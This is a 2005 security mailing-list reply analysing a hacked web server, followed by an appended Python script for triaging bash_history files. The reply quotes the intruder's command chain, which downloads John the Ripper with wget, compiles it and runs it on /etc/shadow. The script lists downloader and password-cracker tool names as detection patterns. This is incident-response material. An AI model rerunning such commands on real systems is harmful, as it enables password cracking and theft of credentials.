Re: SSH compiled with backdoor
From: Javier Fernandez-Sanguino (jfernandez_at_germinus.com)
Date: Tue, 30 Aug 2005 12:43:31 +0200 To: firstname.lastname@example.org
> One of my web servers was hacked on July 17, 2005. bash_history
> w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
> john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
> linux-x86-any-elf;cd ../run;./john /etc/shadow
> According to john, a couple of users had weak passwords, but root
> seemed well protected. From looking in all the bash_history, it
> appears the hacker came in from the website account, and did an su
> from there.
He might have escalated privileges to root from the website account
using a kernel root exploit. You did not mention whose bash_history
you provided, but from the above john run it is evident that he is already
running as root (as he is able to read /etc/shadow).
I wonder why he cracked those passwords if he already had root access.
Maybe he wanted to use them to propagate the attack to nearby systems
or to feed the vulnerable passwords to his personal password file.
BTW, 'securedro' seems to have been removed from Geocities, but not
'cretu_2004' (where the john sources are). The john sources downloaded
from there, though, seem to be the same as those downloaded from Openwall. I
expected them to have "improved" the run/password.lst and added common
(for them) passwords there.
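As an added example, not part of the thread, a small triage helper that applies the reasoning above to a captured bash_history: it splits the `;`-chained command line into individual commands, records downloads and cracker invocations, and flags any command that consumes a root-only file such as /etc/shadow, which is what tells you the session was already running as root. The sample history is the line quoted in the thread, rejoined; the function and list names are my own.

```python
import re
from typing import Dict, List

# Constructed sample: the bash_history lines quoted in the thread, with the
# wrapped command chain rejoined into a single history entry.
SAMPLE_HISTORY = [
    "w",
    "wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;"
    "rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;"
    "cd ../run;./john /etc/shadow",
]

# Files an unprivileged user cannot read on a default install; a command
# that takes one of them as input implies the shell already had root.
ROOT_ONLY_FILES = ("/etc/shadow", "/etc/gshadow", "/etc/sudoers")
DOWNLOADERS = ("wget", "curl", "ftp", "lynx")
CRACKERS = ("john", "hashcat")

# Split a history line on ; && || and | into individual commands.
SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def split_commands(line: str) -> List[str]:
    return [c for c in SPLIT_RE.split(line.strip()) if c]


def triage_history(lines: List[str]) -> Dict[str, object]:
    """Walk a list of bash_history lines and summarise what they imply."""
    findings: Dict[str, object] = {
        "downloads": [], "root_only_reads": [], "cracker_runs": [],
        "implies_root": False,
    }
    for line in lines:
        for cmd in split_commands(line):
            argv = cmd.split()
            if not argv:
                continue
            prog = argv[0].rsplit("/", 1)[-1]  # "./john" -> "john"
            if prog in DOWNLOADERS and len(argv) > 1:
                findings["downloads"].append(argv[1])
            if prog in CRACKERS:
                findings["cracker_runs"].append(cmd)
            for path in ROOT_ONLY_FILES:
                if path in argv[1:]:
                    findings["root_only_reads"].append((prog, path))
                    findings["implies_root"] = True
    return findings


if __name__ == "__main__":
    print(triage_history(SAMPLE_HISTORY))
```

Run against the real history files of every account on the box (not just the web account's) to see which user's shell the john run actually came from.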